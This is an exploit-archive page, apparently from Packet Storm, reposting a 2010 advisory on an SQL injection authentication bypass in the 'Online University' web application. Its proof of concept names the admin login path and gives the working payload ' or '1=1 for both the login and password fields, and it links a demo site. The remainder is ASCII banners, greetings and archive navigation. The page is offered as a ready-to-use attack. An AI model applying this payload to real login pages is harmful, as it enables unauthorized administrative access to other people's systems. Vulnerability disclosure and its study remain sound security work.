Online University SQL Injection

Online University SQL Injection: Posted May 22, 2010; Authored by cr4wl3r; Online University suffers from a remote SQL injection vulnerability that allows for authentication bypass.; tags | exploit, remote, sql injection; SHA-256 | 6d64e686301716b7c4c76d30d4a65824365cc88a71c4e55a76cbe3bffc73070c; Download | Favorite | View

Online University SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-----------------------------
   | Online University (Auth Bypass) SQL Injection Vulnerability  |
   |           (works only with magic_quotes_gpc = off)           |
   ----------------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Script: http://hostnomi.net/detail.php?spid=30
[!] Demo: http://preproject.com/uniweb/ <no for kids or snich>
[!] Dork: no dork for script kiddies :p~
[!] Remote: yes

[x] PoC:

http://h4ckb0x.org/uniweb/siteadmin/login.asp

Login ID : ' or '1=1
Password : ' or '1=1

[~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
[~] Special to: Valentin Hobel (Happy Birthday brotha) ;)

[~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
[~] Regards: cr4wl3r

Top Authors In Last 30 Days

Red Hat 261 files
indoushka 164 files
Ubuntu 101 files
Gentoo 32 files
Debian 22 files
LiquidWorm 14 files
Apple 11 files
malvuln 8 files
Google Security Research 7 files
Rubén López Herrera 5 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,140)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,531)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,026)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,914)
UNIX (9,469)
UnixWare (188)
Windows (6,784)
Other

Online University SQL Injection

Online University SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online University SQL Injection

Share This

Online University SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems